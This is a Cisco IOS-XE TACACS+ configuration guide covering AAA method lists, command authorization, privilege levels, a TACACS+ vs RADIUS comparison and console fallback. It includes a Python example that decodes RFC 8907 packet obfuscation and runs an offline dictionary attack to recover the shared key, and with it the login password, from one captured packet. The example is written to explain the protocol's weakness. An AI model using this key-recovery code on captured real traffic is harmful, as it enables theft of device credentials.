TACACS+

TACACS+ server configuration for device administration, command authorization, and accounting.

TACACS+ Server Definition

Define a TACACS+ server (IOS-XE syntax)
Switch(config)# tacacs server tac-01
Switch(config-server-tacacs)# address ipv4 10.50.1.30
Switch(config-server-tacacs)# key 0 <SHARED-SECRET>
Switch(config-server-tacacs)# timeout 5
TACACS+ uses TCP port 49, not UDP. TCP gives reliable delivery and lets the switch recognise a dead server from a refused or reset connection instead of waiting out retransmission timers the way RADIUS (UDP) must. The shared secret is the only thing protecting the packet bodies on the wire, so make it long and random and prefer a distinct key per device. key 0 means you are typing the secret in cleartext; it then appears in show running-config either as plaintext or as a trivially reversible type 7 string unless type 6 AES key encryption has been enabled on the device, so treat configuration backups as containing the secret.

Server Groups

Group TACACS+ servers for redundancy
Switch(config)# aaa group server tacacs+ TAC-SERVERS
Switch(config-sg-tacacs+)# server name tac-01
Switch(config-sg-tacacs+)# server name tac-02

AAA Configuration for TACACS+

Authentication: TACACS+ with local fallback for device admin
Switch(config)# aaa authentication login default group TAC-SERVERS local
Switch(config)# aaa authentication enable default group TAC-SERVERS enable
Exec authorization: control shell access and privilege level assignment
Switch(config)# aaa authorization exec default group TAC-SERVERS local
Command authorization: every command at the listed privilege level is checked against the TACACS+ server
Switch(config)# aaa authorization commands 1 default group TAC-SERVERS local
Switch(config)# aaa authorization commands 15 default group TAC-SERVERS local

This is the power of TACACS+ over RADIUS for device administration: per-command authorization. TACACS+ keeps authentication, authorization and accounting as separate exchanges, so the switch can ask the server about each command as it is typed and the server decides whether show running-config is permitted for that user. RADIUS returns authentication and authorization together in a single Access-Accept, so the most it can do is hand back a privilege level at login. Two caveats on the method lists above: local is consulted only when every server in the group is unreachable, never when a server answers FAIL, and for command authorization the local method authorizes by privilege level alone, so keep the locally configured levels tight as well.

Command accounting: log every command to the TACACS+ server
Switch(config)# aaa accounting exec default start-stop group TAC-SERVERS
Switch(config)# aaa accounting commands 1 default start-stop group TAC-SERVERS
Switch(config)# aaa accounting commands 15 default start-stop group TAC-SERVERS

Privilege Levels

Custom privilege level: give help desk read-only access
Switch(config)# privilege exec level 7 show running-config
Switch(config)# privilege exec level 7 show interfaces
Switch(config)# privilege exec level 7 show ip route
Switch(config)# username helpdesk privilege 7 algorithm-type scrypt secret <PASSWORD>

Levels run 0-15. Level 0 contains only disable, enable, exit, help and logout; level 1 is user EXEC; level 15 is full privileged EXEC. Custom levels (2-14) let you expose specific commands without full admin rights. Note that privilege exec level moves a command rather than copying it: once show interfaces is placed at level 7 it is unavailable below 7 and available to everyone at 7 or above. TACACS+ can also assign the level dynamically via the priv-lvl attribute in the shell profile, which is why aaa authorization exec is configured above; without exec authorization the switch never asks for the shell profile and the user lands at the locally configured level.

TACACS+ vs RADIUS

Feature                     TACACS+                                      RADIUS
Transport                   TCP 49                                       UDP 1812/1813
Encryption                  Whole body (MD5 keystream from shared key)   User-Password attribute only
AAA model                   Separate AuthN / AuthZ / Acct exchanges      AuthN and AuthZ in one Access-Accept
Authorization granularity   Per-command                                  Per-session (privilege level, VLAN, ACL)
Accounting detail           Command-level                                Session-level
Primary use case            Device administration                        Network access (802.1X, MAB, VPN)
Network-access protocols    No EAP; ASCII, PAP, CHAP, MS-CHAP only       EAP (802.1X), PPP and VPN attributes

Read the Encryption row carefully. TACACS+ XORs the packet body with an MD5 keystream derived from the session ID, the shared key, the version and the sequence number; RFC 8907 calls this obfuscation rather than encryption, it provides no integrity protection, and an eavesdropper holding one captured packet can test key guesses offline. RADIUS hides even less (only User-Password), which is why both protocols belong on an isolated management network or inside IPsec, with a shared key that cannot be guessed.

Rule of thumb: TACACS+ for managing the device (who can run which commands). RADIUS for managing who gets on the network (802.1X, MAB, VPN).
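The Encryption row is the one worth seeing in code. What follows is an added example, not part of the original page and not Cisco or any TACACS+ server's code: it builds a TACACS+ authentication START packet, applies the RFC 8907 pseudo-pad obfuscation, decodes it with the correct key, and then runs the offline dictionary attack an eavesdropper can mount against a single captured packet. The user name, password, shared key, session ID and wordlist are all constructed for the example; the TAC_PLUS_* constant values and the pad derivation are taken from RFC 8907.

```python
"""Added example: TACACS+ (RFC 8907) START packet, body obfuscation, and the
offline key-guessing attack it allows. All values below are constructed."""
import hashlib
import struct

TAC_PLUS_AUTHEN = 1               # header type: authentication
TAC_PLUS_AUTHEN_LOGIN = 1         # START action
TAC_PLUS_AUTHEN_TYPE_PAP = 2      # password rides in the data field
TAC_PLUS_AUTHEN_SVC_LOGIN = 1
TAC_PLUS_UNENCRYPTED_FLAG = 0x01
HEADER = struct.Struct("!BBBBII")   # version, type, seq_no, flags, session_id, length
START = struct.Struct("!BBBBBBBB")  # action, priv_lvl, authen_type, service, 4 field lengths


def pseudo_pad(session_id, key, version, seq_no, length):
    """RFC 8907 4.5: MD5_1 = MD5(sid|key|ver|seq); MD5_n = MD5(sid|key|ver|seq|MD5_n-1)."""
    prefix = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, last = b"", b""
    while len(pad) < length:
        last = hashlib.md5(prefix + last).digest()
        pad += last
    return pad[:length]


def obfuscate(body, session_id, key, version, seq_no):
    """XOR the body with the pseudo-pad; calling it again reverses it."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def build_authen_start(user, password, port, rem_addr, session_id, key, priv_lvl=1):
    """What the switch sends first for a PAP login (minor version 1 is mandatory for PAP)."""
    version, seq_no = 0xC1, 1
    body = START.pack(TAC_PLUS_AUTHEN_LOGIN, priv_lvl, TAC_PLUS_AUTHEN_TYPE_PAP,
                      TAC_PLUS_AUTHEN_SVC_LOGIN, len(user), len(port), len(rem_addr), len(password))
    body += user + port + rem_addr + password
    header = HEADER.pack(version, TAC_PLUS_AUTHEN, seq_no, 0, session_id, len(body))
    return header + obfuscate(body, session_id, key, version, seq_no)


def parse_authen_start(packet, key):
    """Decode a START with the given key; None if the result is not a plausible START."""
    version, ptype, seq_no, flags, session_id, length = HEADER.unpack(packet[:HEADER.size])
    body = packet[HEADER.size:HEADER.size + length]
    if ptype != TAC_PLUS_AUTHEN or len(body) != length:
        return None
    if not flags & TAC_PLUS_UNENCRYPTED_FLAG:   # a cleartext body should be rejected by any real server
        body = obfuscate(body, session_id, key, version, seq_no)
    action, priv_lvl, authen_type, service, ulen, plen, rlen, dlen = START.unpack(body[:START.size])
    if START.size + ulen + plen + rlen + dlen != length:
        return None                              # field lengths disagree with the header
    fields, off = [], START.size
    for n in (ulen, plen, rlen, dlen):
        fields.append(body[off:off + n])
        off += n
    user, port, rem_addr, data = fields
    if not all(32 <= c < 127 for c in user + port + rem_addr):
        return None                              # names and addresses are printable ASCII
    return {"action": action, "priv_lvl": priv_lvl, "authen_type": authen_type,
            "service": service, "user": user.decode(), "port": port.decode(),
            "rem_addr": rem_addr.decode(), "data": data}


def recover_key(packet, candidates):
    """Offline dictionary attack on one captured packet. A wrong key yields random bytes
    that almost never pass the length arithmetic and the fixed-field range checks, so
    each guess costs a few MD5 operations and gives a clean yes/no answer."""
    for cand in candidates:
        p = parse_authen_start(packet, cand)
        if p and p["action"] == TAC_PLUS_AUTHEN_LOGIN and p["priv_lvl"] <= 15 \
                and 1 <= p["authen_type"] <= 6:
            return cand
    return None


if __name__ == "__main__":
    KEY = b"t4c-s3cret"                          # hypothetical shared secret
    pkt = build_authen_start(b"helpdesk", b"Winter2024!", b"tty1", b"10.50.1.1",
                             0x1A2B3C4D, KEY)
    print(parse_authen_start(pkt, KEY))          # decoded fields, password in "data"
    print(recover_key(pkt, [b"cisco", b"password", b"tacacs", KEY]))
```

The attacker never needs the server: the header travels in cleartext, the pad depends only on header fields plus the key, and a correct guess is recognisable from the body's own structure. Nothing in the packet authenticates it either, so bits can be flipped in transit without detection. That is why "full packet body" in the table above is not confidentiality against anyone who can sniff the management network, and why the key length and the network path matter more than the protocol choice.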

Source Interface

Force TACACS+ packets from a consistent source (the server looks up the shared key by client address, so the source must match the client entry configured on the server)
Switch(config)# ip tacacs source-interface Loopback0

Verification

Show TACACS+ server status and statistics
Switch# show tacacs
Switch# show aaa servers
Test TACACS+ authentication
Switch# test aaa group TAC-SERVERS admin <PASSWORD> new-code
Debug TACACS+: watch the authentication/authorization exchange
Switch# debug tacacs authentication
Switch# debug tacacs authorization
Switch# debug tacacs accounting

Expected debug output shows the TCP connection to port 49, the authentication START packet, and the server's PASS or FAIL reply. A refused TCP connection means the TACACS+ daemon is down or a firewall is blocking port 49, and the switch will fall through to the next method in the list. A prompt FAIL means the server is reachable and rejected the request, and no fallback to local happens in that case. A shared-key mismatch rarely looks like a clean FAIL, because the server cannot decode the body; check the server's own log when the switch reports an error or a dropped connection. Turn debugging off with undebug all when finished; the output is verbose and competes for CPU on a busy control plane.

Console Escape Hatch

Always keep console on local auth: never lock yourself out
Switch(config)# aaa authentication login CONSOLE local
Switch(config)# line con 0
Switch(config-line)# login authentication CONSOLE

The default login list falls back to local only when every TACACS+ server is unreachable. If the servers are up but reject you (a rotated key you forgot to push, a deleted account, a broken policy), default never tries local, and a console line bound to default leaves password recovery as the only way back in. A named list that is local-only on the console removes that failure mode; the console port is physically guarded, so the reduced assurance is acceptable. Note that aaa authorization exec and aaa authorization commands are not applied to the console unless aaa authorization console is configured, so the console user simply gets the privilege level of the local account.